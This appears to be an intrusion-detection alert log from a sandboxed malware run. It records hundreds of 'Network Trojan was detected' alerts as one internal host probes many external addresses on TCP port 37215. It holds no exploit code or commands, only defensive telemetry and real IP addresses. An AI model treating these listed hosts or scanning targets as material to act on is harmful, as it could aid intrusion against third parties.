              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353672186.132.102.037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350000102.125.209.2737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.235359641.204.8.437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342226186.50.139.16937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342392105.0.245.3237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358992197.3.172.23137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2354186160.191.177.1537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344394160.48.139.24937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341666160.70.215.6037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2338204223.39.10.10237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336776186.60.180.24837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2349676197.7.231.2237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358992160.196.119.11537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2345996157.69.119.13737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359936186.246.187.17537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336476156.249.217.20637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2333536181.210.147.23437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2338644102.73.210.14637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344232105.162.166.15937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339990223.203.136.7937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359624186.168.23.21137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336954186.144.138.14137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341024190.204.11.19337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348912181.132.59.25337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348316190.28.168.24237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343954156.41.129.23637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.234204241.59.182.24137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343466223.205.185.3337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341536156.63.155.17437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2352698105.158.26.1637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2337738160.196.220.637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353242160.71.67.3737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342094181.122.190.13637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344524181.214.255.15937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356398186.98.116.12637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350828181.38.27.2137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2345446105.97.113.22337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2355836190.156.185.2937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335256102.254.62.22337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360764160.145.73.12737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2345776190.139.171.12337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341690186.83.48.337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348964197.188.244.3237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342904197.197.252.6737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343390157.188.59.3637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343242181.148.230.24637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2337576181.204.35.15137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2345720105.113.238.12937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2357232197.232.142.18037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348574197.181.127.16937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359740223.13.181.20137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341998160.208.188.2537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.235646641.7.63.4337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2337006186.159.148.11237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360540186.136.12.4337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2351488156.86.138.15437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356338160.231.184.2737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339058160.78.234.12337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2351256181.81.183.24937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336240186.232.217.12537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350240102.132.98.18637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2354922102.215.172.3737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2346782105.223.41.19137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2345120160.239.174.14037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350786223.34.128.23237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341682186.172.198.18237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336378105.162.217.18437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2346000181.31.197.13237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344096186.204.137.2537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2346940181.28.36.17937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343132156.160.148.18737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342488190.177.255.13337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342766223.161.186.4337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342450186.38.131.23137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2347556102.134.241.5937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358990105.63.121.9837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2337638102.38.165.15937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2352976186.44.122.9837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339520105.33.115.17737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344564102.230.213.12837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2334880181.223.123.14737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350292102.247.147.20137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356898102.8.134.6737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353140197.238.225.25137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350742156.115.178.7837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2357732102.110.18.5437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348048102.135.110.23437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348552181.12.153.1837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341362186.38.184.20337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359056197.11.219.15537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350772157.43.99.1437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350044160.25.125.15737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2354402156.247.76.13537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335166181.116.32.17637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2354588160.89.58.19037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344410160.83.155.11237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.236012041.140.79.19837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343642105.234.73.10737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336248102.141.42.4637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2347724197.216.47.3737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348642156.184.182.13437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339402156.54.117.3937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342534190.236.146.1337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2352524105.156.116.037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360440102.125.28.337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335278157.123.167.20037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2333624197.18.198.23237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350172181.232.241.13937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353780102.157.186.16137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359566186.204.43.2337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2334978105.236.16.25137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339158160.184.226.2737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348240102.132.199.8937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2351750223.10.194.10837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360550160.246.4.16137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348740197.226.178.17537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335958186.98.112.21037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343236197.201.132.10237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2338712223.213.44.6537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2334598105.174.239.21137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2338494156.194.23.2637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2337566156.124.202.11837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343588156.30.235.7237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344008186.144.250.16837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2357162186.83.252.3237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2334586105.170.5.15737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2347758105.223.181.2837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359264186.96.201.21837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343404105.58.115.16837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358816190.122.104.11537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.235615841.7.189.13237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2337388223.189.197.12537215TCP
              2024-12-13T01:14:35.239740+010028352221A Network Trojan was detected192.168.2.2338280186.209.25.14337215TCP
              2024-12-13T01:14:36.931877+010028352221A Network Trojan was detected192.168.2.2355892186.64.108.10937215TCP
              2024-12-13T01:14:37.017402+010028352221A Network Trojan was detected192.168.2.2336000186.154.12.20537215TCP
              2024-12-13T01:14:37.078046+010028352221A Network Trojan was detected192.168.2.2347132186.117.148.22137215TCP
              2024-12-13T01:14:37.131220+010028352221A Network Trojan was detected192.168.2.2359578186.195.136.14837215TCP
              2024-12-13T01:14:38.242102+010028352221A Network Trojan was detected192.168.2.2340520186.91.208.9437215TCP
              2024-12-13T01:14:38.525989+010028352221A Network Trojan was detected192.168.2.2348624190.96.95.3637215TCP
              2024-12-13T01:14:53.539335+010028352221A Network Trojan was detected192.168.2.2346666186.161.109.5137215TCP
              2024-12-13T01:14:53.601334+010028352221A Network Trojan was detected192.168.2.2348136186.12.149.10237215TCP
              2024-12-13T01:14:53.601528+010028352221A Network Trojan was detected192.168.2.2338338186.75.149.23237215TCP
              2024-12-13T01:14:53.602355+010028352221A Network Trojan was detected192.168.2.2349342186.119.176.23537215TCP
              2024-12-13T01:14:53.633005+010028352221A Network Trojan was detected192.168.2.2357120186.174.180.20137215TCP
              2024-12-13T01:14:53.647741+010028352221A Network Trojan was detected192.168.2.2339580186.201.188.5637215TCP
              2024-12-13T01:14:53.649503+010028352221A Network Trojan was detected192.168.2.2358566186.136.135.9537215TCP
              2024-12-13T01:14:53.679004+010028352221A Network Trojan was detected192.168.2.2340120186.62.64.16737215TCP
              2024-12-13T01:14:53.679439+010028352221A Network Trojan was detected192.168.2.2342096186.234.55.17037215TCP
              2024-12-13T01:14:53.725781+010028352221A Network Trojan was detected192.168.2.2360018186.166.117.3837215TCP
              2024-12-13T01:14:53.725875+010028352221A Network Trojan was detected192.168.2.2348088186.156.72.25537215TCP
              2024-12-13T01:14:53.741157+010028352221A Network Trojan was detected192.168.2.2333178186.73.174.037215TCP
              2024-12-13T01:14:53.788062+010028352221A Network Trojan was detected192.168.2.2357684186.204.170.18837215TCP
              2024-12-13T01:14:53.819173+010028352221A Network Trojan was detected192.168.2.2336922186.170.41.17437215TCP
              2024-12-13T01:14:53.819503+010028352221A Network Trojan was detected192.168.2.2349216186.86.173.18337215TCP
              2024-12-13T01:14:53.850772+010028352221A Network Trojan was detected192.168.2.2353652186.121.138.10437215TCP
              2024-12-13T01:14:54.038108+010028352221A Network Trojan was detected192.168.2.2355416186.24.127.937215TCP
              2024-12-13T01:14:54.053644+010028352221A Network Trojan was detected192.168.2.2360928186.223.255.18537215TCP
              2024-12-13T01:14:54.053780+010028352221A Network Trojan was detected192.168.2.2344446186.57.199.23637215TCP
              2024-12-13T01:14:54.100698+010028352221A Network Trojan was detected192.168.2.2337314186.123.254.12937215TCP
              2024-12-13T01:14:54.100848+010028352221A Network Trojan was detected192.168.2.2359834186.118.218.16737215TCP
              2024-12-13T01:14:54.147309+010028352221A Network Trojan was detected192.168.2.2356098186.46.190.17637215TCP
              2024-12-13T01:14:54.554375+010028352221A Network Trojan was detected192.168.2.2344568186.9.106.11437215TCP
              2024-12-13T01:14:54.587369+010028352221A Network Trojan was detected192.168.2.2335366186.108.208.25537215TCP
              2024-12-13T01:14:54.587415+010028352221A Network Trojan was detected192.168.2.2343788186.120.100.13337215TCP
              2024-12-13T01:14:54.587610+010028352221A Network Trojan was detected192.168.2.2351570186.150.234.23637215TCP
              2024-12-13T01:14:54.725672+010028352221A Network Trojan was detected192.168.2.2356644186.145.220.9837215TCP
              2024-12-13T01:14:54.741077+010028352221A Network Trojan was detected192.168.2.2353768186.101.133.17337215TCP
              2024-12-13T01:14:54.772382+010028352221A Network Trojan was detected192.168.2.2353136186.242.228.3937215TCP
              2024-12-13T01:14:54.804036+010028352221A Network Trojan was detected192.168.2.2342374186.110.190.11537215TCP
              2024-12-13T01:14:54.804092+010028352221A Network Trojan was detected192.168.2.2346362186.7.234.12637215TCP
              2024-12-13T01:14:56.678809+010028352221A Network Trojan was detected192.168.2.2337604186.121.193.24637215TCP
              2024-12-13T01:14:56.694462+010028352221A Network Trojan was detected192.168.2.2357754186.96.143.6637215TCP
              2024-12-13T01:14:56.694479+010028352221A Network Trojan was detected192.168.2.2343248186.40.157.537215TCP
              2024-12-13T01:14:56.710009+010028352221A Network Trojan was detected192.168.2.2345712186.73.163.3737215TCP
              2024-12-13T01:14:56.710029+010028352221A Network Trojan was detected192.168.2.2344720186.212.3.15037215TCP
              2024-12-13T01:14:56.726928+010028352221A Network Trojan was detected192.168.2.2347420186.205.153.17037215TCP
              2024-12-13T01:14:56.727442+010028352221A Network Trojan was detected192.168.2.2345146186.53.187.13837215TCP
              2024-12-13T01:14:56.727733+010028352221A Network Trojan was detected192.168.2.2340130186.115.226.16437215TCP
              2024-12-13T01:14:56.728666+010028352221A Network Trojan was detected192.168.2.2335604186.43.48.4037215TCP
              2024-12-13T01:14:56.728732+010028352221A Network Trojan was detected192.168.2.2345010186.55.175.19337215TCP
              2024-12-13T01:14:56.729206+010028352221A Network Trojan was detected192.168.2.2356300186.133.58.16337215TCP
              2024-12-13T01:14:56.730271+010028352221A Network Trojan was detected192.168.2.2341490186.64.138.24137215TCP
              2024-12-13T01:14:56.772379+010028352221A Network Trojan was detected192.168.2.2360250186.81.189.17637215TCP
              2024-12-13T01:14:56.772476+010028352221A Network Trojan was detected192.168.2.2341438186.27.90.24537215TCP
              2024-12-13T01:14:56.773195+010028352221A Network Trojan was detected192.168.2.2350066186.236.224.10437215TCP
              2024-12-13T01:14:56.773596+010028352221A Network Trojan was detected192.168.2.2343406186.161.92.21737215TCP
              2024-12-13T01:14:56.773679+010028352221A Network Trojan was detected192.168.2.2342292186.32.31.2537215TCP
              2024-12-13T01:14:56.773823+010028352221A Network Trojan was detected192.168.2.2342682186.124.8.2937215TCP
              2024-12-13T01:14:56.773991+010028352221A Network Trojan was detected192.168.2.2346390186.126.117.10237215TCP
              2024-12-13T01:14:56.774083+010028352221A Network Trojan was detected192.168.2.2353466186.51.211.8337215TCP
              2024-12-13T01:14:56.803551+010028352221A Network Trojan was detected192.168.2.2354372186.223.22.7337215TCP
              2024-12-13T01:14:56.803753+010028352221A Network Trojan was detected192.168.2.2347002186.115.76.6437215TCP
              2024-12-13T01:14:56.804011+010028352221A Network Trojan was detected192.168.2.2351936186.11.84.19937215TCP
              2024-12-13T01:14:56.804425+010028352221A Network Trojan was detected192.168.2.2351030186.226.67.22737215TCP
              2024-12-13T01:14:56.804516+010028352221A Network Trojan was detected192.168.2.2337918186.50.181.16437215TCP
              2024-12-13T01:14:56.804615+010028352221A Network Trojan was detected192.168.2.2333724186.67.55.24737215TCP
              2024-12-13T01:14:56.804842+010028352221A Network Trojan was detected192.168.2.2351078186.28.140.8237215TCP
              2024-12-13T01:14:56.805069+010028352221A Network Trojan was detected192.168.2.2353262186.28.37.18737215TCP
              2024-12-13T01:14:56.805147+010028352221A Network Trojan was detected192.168.2.2341698186.152.202.25237215TCP
              2024-12-13T01:14:56.805249+010028352221A Network Trojan was detected192.168.2.2341474186.2.133.16937215TCP
              2024-12-13T01:14:56.805397+010028352221A Network Trojan was detected192.168.2.2354994186.107.132.17037215TCP
              2024-12-13T01:14:56.805573+010028352221A Network Trojan was detected192.168.2.2358880186.180.134.4137215TCP
              2024-12-13T01:14:56.805661+010028352221A Network Trojan was detected192.168.2.2355438186.147.206.11737215TCP
              2024-12-13T01:14:56.805853+010028352221A Network Trojan was detected192.168.2.2344840186.46.246.24837215TCP
              2024-12-13T01:14:56.806041+010028352221A Network Trojan was detected192.168.2.2343458186.252.183.11537215TCP
              2024-12-13T01:14:56.806181+010028352221A Network Trojan was detected192.168.2.2340146186.178.208.10037215TCP
              2024-12-13T01:14:56.835082+010028352221A Network Trojan was detected192.168.2.2345154156.79.22.11237215TCP
              2024-12-13T01:14:56.852481+010028352221A Network Trojan was detected192.168.2.2346762156.42.155.10737215TCP
              2024-12-13T01:14:56.944313+010028352221A Network Trojan was detected192.168.2.2342468156.38.111.8837215TCP
              2024-12-13T01:14:56.991475+010028352221A Network Trojan was detected192.168.2.2351126156.57.135.537215TCP
              2024-12-13T01:14:57.022612+010028352221A Network Trojan was detected192.168.2.2337628156.145.177.2637215TCP
              2024-12-13T01:14:57.038295+010028352221A Network Trojan was detected192.168.2.2345370156.188.75.20537215TCP
              2024-12-13T01:14:57.038295+010028352221A Network Trojan was detected192.168.2.2343972156.239.57.11637215TCP
              2024-12-13T01:14:57.053661+010028352221A Network Trojan was detected192.168.2.2352516156.250.170.15637215TCP
              2024-12-13T01:14:57.054043+010028352221A Network Trojan was detected192.168.2.2360012156.100.45.13137215TCP
              2024-12-13T01:14:57.100564+010028352221A Network Trojan was detected192.168.2.2356974156.163.43.20237215TCP
              2024-12-13T01:14:57.225710+010028352221A Network Trojan was detected192.168.2.2348612156.247.168.20437215TCP
              2024-12-13T01:14:57.225753+010028352221A Network Trojan was detected192.168.2.2356338156.165.75.19537215TCP
              2024-12-13T01:14:57.288074+010028352221A Network Trojan was detected192.168.2.2357308156.164.40.1737215TCP
              2024-12-13T01:14:57.288183+010028352221A Network Trojan was detected192.168.2.2337314156.50.119.11637215TCP
              2024-12-13T01:14:57.303749+010028352221A Network Trojan was detected192.168.2.2345312156.207.105.19037215TCP
              2024-12-13T01:14:57.303834+010028352221A Network Trojan was detected192.168.2.2341032156.249.55.5237215TCP
              2024-12-13T01:14:57.866419+010028352221A Network Trojan was detected192.168.2.2347208156.248.4.17237215TCP
              2024-12-13T01:14:57.882039+010028352221A Network Trojan was detected192.168.2.2352114156.62.234.24637215TCP
              2024-12-13T01:14:57.882144+010028352221A Network Trojan was detected192.168.2.2356046156.11.228.15737215TCP
              2024-12-13T01:14:57.882144+010028352221A Network Trojan was detected192.168.2.2346902156.35.226.20537215TCP
              2024-12-13T01:14:57.882147+010028352221A Network Trojan was detected192.168.2.2347936156.136.201.24737215TCP
              2024-12-13T01:14:57.882190+010028352221A Network Trojan was detected192.168.2.2358970156.127.77.13037215TCP
              2024-12-13T01:14:57.882324+010028352221A Network Trojan was detected192.168.2.2348364156.190.204.22437215TCP
              2024-12-13T01:14:57.882410+010028352221A Network Trojan was detected192.168.2.2344112156.76.146.22337215TCP
              2024-12-13T01:14:57.897477+010028352221A Network Trojan was detected192.168.2.2357564156.58.113.20637215TCP
              2024-12-13T01:14:57.897674+010028352221A Network Trojan was detected192.168.2.2358176156.194.105.23937215TCP
              2024-12-13T01:14:57.897678+010028352221A Network Trojan was detected192.168.2.2338838156.244.210.16637215TCP
              2024-12-13T01:14:57.897749+010028352221A Network Trojan was detected192.168.2.2342836156.235.105.8537215TCP
              2024-12-13T01:14:57.897831+010028352221A Network Trojan was detected192.168.2.2340884156.99.218.22137215TCP
              2024-12-13T01:14:57.897917+010028352221A Network Trojan was detected192.168.2.2341720156.150.45.18737215TCP
              2024-12-13T01:14:57.913035+010028352221A Network Trojan was detected192.168.2.2357746156.233.137.7437215TCP
              2024-12-13T01:14:57.913203+010028352221A Network Trojan was detected192.168.2.2356358156.165.4.14337215TCP
              2024-12-13T01:14:58.116520+010028352221A Network Trojan was detected192.168.2.2343132190.54.138.21637215TCP
              2024-12-13T01:14:58.147437+010028352221A Network Trojan was detected192.168.2.2355652190.51.226.1437215TCP
              2024-12-13T01:15:00.100738+010028352221A Network Trojan was detected192.168.2.2357340157.251.244.16737215TCP
              2024-12-13T01:15:05.382111+010028352221A Network Trojan was detected192.168.2.2346586197.203.157.6837215TCP
              2024-12-13T01:15:05.475926+010028352221A Network Trojan was detected192.168.2.2340496156.21.203.5637215TCP
              2024-12-13T01:15:06.350774+010028352221A Network Trojan was detected192.168.2.2352222197.64.25.23937215TCP
              2024-12-13T01:15:06.350865+010028352221A Network Trojan was detected192.168.2.2359676197.44.93.14537215TCP
              2024-12-13T01:15:06.350948+010028352221A Network Trojan was detected192.168.2.2350764197.220.45.3737215TCP
              2024-12-13T01:15:06.382193+010028352221A Network Trojan was detected192.168.2.2333084197.243.58.2737215TCP
              2024-12-13T01:15:06.475837+010028352221A Network Trojan was detected192.168.2.2348482102.155.236.19637215TCP
              2024-12-13T01:15:07.412070+010028352221A Network Trojan was detected192.168.2.2347448160.89.148.4937215TCP
              2024-12-13T01:15:08.413100+010028352221A Network Trojan was detected192.168.2.2351354197.56.233.13937215TCP
              2024-12-13T01:15:08.553848+010028352221A Network Trojan was detected192.168.2.2337060157.175.0.20937215TCP
              2024-12-13T01:15:08.772788+010028352221A Network Trojan was detected192.168.2.2341554156.161.190.18937215TCP
              2024-12-13T01:15:08.804079+010028352221A Network Trojan was detected192.168.2.2349186156.225.76.15937215TCP
              2024-12-13T01:15:09.554085+010028352221A Network Trojan was detected192.168.2.2342528102.87.229.6837215TCP
              2024-12-13T01:15:09.804283+010028352221A Network Trojan was detected192.168.2.2339046186.92.111.4937215TCP
              2024-12-13T01:15:11.554389+010028352221A Network Trojan was detected192.168.2.2346314157.235.15.7437215TCP
              2024-12-13T01:15:11.929191+010028352221A Network Trojan was detected192.168.2.2337560160.21.215.13537215TCP
              2024-12-13T01:15:13.835768+010028352221A Network Trojan was detected192.168.2.2357450181.35.247.6337215TCP
              2024-12-13T01:15:16.866688+010028352221A Network Trojan was detected192.168.2.2357252181.36.218.18937215TCP
              2024-12-13T01:15:16.882851+010028352221A Network Trojan was detected192.168.2.2333860181.166.140.11937215TCP
              2024-12-13T01:15:16.898450+010028352221A Network Trojan was detected192.168.2.2339950181.36.65.16637215TCP
              2024-12-13T01:15:16.913400+010028352221A Network Trojan was detected192.168.2.2354304181.174.17.14937215TCP
              2024-12-13T01:15:16.931595+010028352221A Network Trojan was detected192.168.2.2358796181.131.119.11237215TCP
              2024-12-13T01:15:16.931598+010028352221A Network Trojan was detected192.168.2.2337282181.44.186.6137215TCP
              2024-12-13T01:15:16.976500+010028352221A Network Trojan was detected192.168.2.2345798197.51.150.1537215TCP
              2024-12-13T01:15:16.976626+010028352221A Network Trojan was detected192.168.2.2349562197.205.191.15637215TCP
              2024-12-13T01:15:17.007012+010028352221A Network Trojan was detected192.168.2.2344240197.141.14.10337215TCP
              2024-12-13T01:15:17.007194+010028352221A Network Trojan was detected192.168.2.2355374197.117.143.21637215TCP
              2024-12-13T01:15:17.179013+010028352221A Network Trojan was detected192.168.2.2352502197.134.88.10337215TCP
              2024-12-13T01:15:17.226388+010028352221A Network Trojan was detected192.168.2.2335252197.251.89.22837215TCP
              2024-12-13T01:15:17.241594+010028352221A Network Trojan was detected192.168.2.2350350197.153.24.15737215TCP
              2024-12-13T01:15:17.883247+010028352221A Network Trojan was detected192.168.2.2341550181.187.174.2237215TCP
              2024-12-13T01:15:17.898483+010028352221A Network Trojan was detected192.168.2.2352878181.227.175.25237215TCP
              2024-12-13T01:15:17.913964+010028352221A Network Trojan was detected192.168.2.2338172181.176.206.25437215TCP
              2024-12-13T01:15:17.929279+010028352221A Network Trojan was detected192.168.2.2335052181.174.202.3637215TCP
              2024-12-13T01:15:18.116599+010028352221A Network Trojan was detected192.168.2.235064041.142.27.13837215TCP
              2024-12-13T01:15:20.115898+010028352221A Network Trojan was detected192.168.2.2353286181.245.195.24637215TCP
              2024-12-13T01:15:20.115898+010028352221A Network Trojan was detected192.168.2.2334160181.44.80.17337215TCP
              2024-12-13T01:15:20.115914+010028352221A Network Trojan was detected192.168.2.2345740181.180.43.23237215TCP
              2024-12-13T01:15:20.115915+010028352221A Network Trojan was detected192.168.2.2349116181.186.32.23237215TCP
              2024-12-13T01:15:20.115916+010028352221A Network Trojan was detected192.168.2.2348264181.20.244.6037215TCP
              2024-12-13T01:15:20.115923+010028352221A Network Trojan was detected192.168.2.2352074197.104.253.4437215TCP
              2024-12-13T01:15:20.193262+010028352221A Network Trojan was detected192.168.2.2350484197.98.103.12037215TCP
